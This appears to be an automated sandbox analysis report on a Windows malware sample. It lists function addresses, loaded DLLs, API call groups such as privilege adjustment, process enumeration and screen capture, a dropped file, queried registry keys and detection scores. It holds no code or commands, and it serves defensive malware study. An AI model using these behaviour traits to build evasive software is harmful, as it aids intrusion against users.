Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140012EF0	0_2_0000000140012EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140054F10	0_2_0000000140054F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140018F60	0_2_0000000140018F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140050FB0	0_2_0000000140050FB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140127000	0_2_0000000140127000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140015020	0_2_0000000140015020
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140065030	0_2_0000000140065030
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B30B0	0_2_00000001400B30B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400110F0	0_2_00000001400110F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009710B	0_2_000000014009710B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097119	0_2_0000000140097119
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097124	0_2_0000000140097124
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014006D140	0_2_000000014006D140
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007B150	0_2_000000014007B150
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140063160	0_2_0000000140063160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003F1A0	0_2_000000014003F1A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400751C0	0_2_00000001400751C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400971E0	0_2_00000001400971E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400971F9	0_2_00000001400971F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097201	0_2_0000000140097201
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097217	0_2_0000000140097217
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005B270	0_2_000000014005B270
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140061280	0_2_0000000140061280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140003286	0_2_0000000140003286
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400172D0	0_2_00000001400172D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000D310	0_2_000000014000D310
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005D390	0_2_000000014005D390
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400993B0	0_2_00000001400993B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400393C9	0_2_00000001400393C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400573E0	0_2_00000001400573E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009D400	0_2_000000014009D400
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007F420	0_2_000000014007F420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005F430	0_2_000000014005F430
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140059470	0_2_0000000140059470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009949B	0_2_000000014009949B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400254A0	0_2_00000001400254A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007B4C0	0_2_000000014007B4C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004B4F0	0_2_000000014004B4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004F4F0	0_2_000000014004F4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400855B0	0_2_00000001400855B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400715D0	0_2_00000001400715D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400635D0	0_2_00000001400635D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140051670	0_2_0000000140051670
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400156F0	0_2_00000001400156F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005F700	0_2_000000014005F700
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003F710	0_2_000000014003F710
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140043740	0_2_0000000140043740
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140019770	0_2_0000000140019770
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005B7B0	0_2_000000014005B7B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400997DC	0_2_00000001400997DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400337DF	0_2_00000001400337DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140065860	0_2_0000000140065860
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140089870	0_2_0000000140089870
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400358E6	0_2_00000001400358E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400A9900	0_2_00000001400A9900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D1940	0_2_00000001400D1940
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001B980	0_2_000000014001B980
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D9990	0_2_00000001400D9990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140053990	0_2_0000000140053990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400179A0	0_2_00000001400179A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400719B0	0_2_00000001400719B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400059F0	0_2_00000001400059F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004DA20	0_2_000000014004DA20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007DA28	0_2_000000014007DA28
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140069A60	0_2_0000000140069A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014006FA70	0_2_000000014006FA70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140039AA0	0_2_0000000140039AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003FAB0	0_2_000000014003FAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008FAE0	0_2_000000014008FAE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140073BA0	0_2_0000000140073BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140031BA9	0_2_0000000140031BA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008DBF3	0_2_000000014008DBF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005DC20	0_2_000000014005DC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140099C21	0_2_0000000140099C21
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004BC80	0_2_000000014004BC80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014002BC90	0_2_000000014002BC90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140097CA0	0_2_0000000140097CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400CFCAC	0_2_00000001400CFCAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140057CB0	0_2_0000000140057CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001FD19	0_2_000000014001FD19
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007BD2E	0_2_000000014007BD2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140047D40	0_2_0000000140047D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000DDC0	0_2_000000014000DDC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014003DE00	0_2_000000014003DE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140063E50	0_2_0000000140063E50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140013E60	0_2_0000000140013E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400A3ED0	0_2_00000001400A3ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140051EE0	0_2_0000000140051EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140093EF0	0_2_0000000140093EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014005FF02	0_2_000000014005FF02
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400DDF1C	0_2_00000001400DDF1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140099F2D	0_2_0000000140099F2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004FF2B	0_2_000000014004FF2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140085F40	0_2_0000000140085F40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014008FF50	0_2_000000014008FF50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400BBF6B	0_2_00000001400BBF6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014006DF80	0_2_000000014006DF80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014006BF90	0_2_000000014006BF90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014004DFA0	0_2_000000014004DFA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014000FFD0	0_2_000000014000FFD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: String function: 00000001400CA91C appears 395 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: String function: 00000001400403F0 appears 63 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: String function: 0000000140040740 appears 463 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: String function: 00000001400CB614 appears 38 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: String function: 00000001400CAB74 appears 60 times

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000000.2064725844.000000014012A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.14270.3068.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Section loaded: coremessaging.dll	Jump to behavior

Source: classification engine

Classification label: mal56.evad.winEXE@3/5@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140041B60 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,

0_2_0000000140041B60

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140081CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

0_2_0000000140081CD0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140060CB9 wcsncpy,GetDiskFreeSpaceW,GetLastError,free,malloc,

0_2_0000000140060CB9

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_0000000140081F60 CreateToolhelp32Snapshot,Process32FirstW,_wcstoi64,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,

0_2_0000000140081F60

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400620E0 _wcstoi64,CoCreateInstance,powf,powf,powf,log10,free,malloc,free,malloc,

0_2_00000001400620E0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400207E0 FindResourceW,SizeofResource,LoadResource,LockResource,

0_2_00000001400207E0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\1img.png

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	ReversingLabs: Detection: 13%
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Virustotal: Detection: 45%

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe

Static file information: File size 1277440 > 1048576

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400B4300 LoadLibraryW,GetProcAddress,

0_2_00000001400B4300

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe

Static PE information: section name: text

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014012A4CB push rbp; iretd	0_2_000000014012A4DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009D078 push rsi; retf 0009h	0_2_000000014009D079
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400D912C push rbp; iretd	0_2_00000001400D9624

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B2650 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,	0_2_00000001400B2650
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014009E220 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,	0_2_000000014009E220
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400B2480 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	0_2_00000001400B2480
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140050882 IsZoomed,IsIconic,	0_2_0000000140050882
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400AE920 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	0_2_00000001400AE920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014007A9C0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,free,malloc,free,malloc,	0_2_000000014007A9C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_00000001400A29F0 CheckMenuItem,CheckMenuItem,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetForegroundWindow,GetWindowThreadProcessId,SetForegroundWindow,SetForegroundWindow,TrackPopupMenuEx,PostMessageW,GetForegroundWindow,SetForegroundWindow,	0_2_00000001400A29F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140058D60 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,free,malloc,	0_2_0000000140058D60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140044E60 IsWindow,DestroyWindow,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,MonitorFromPoint,GetMonitorInfoW,IsWindow,CreateWindowExW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,	0_2_0000000140044E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140054F10 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,malloc,	0_2_0000000140054F10
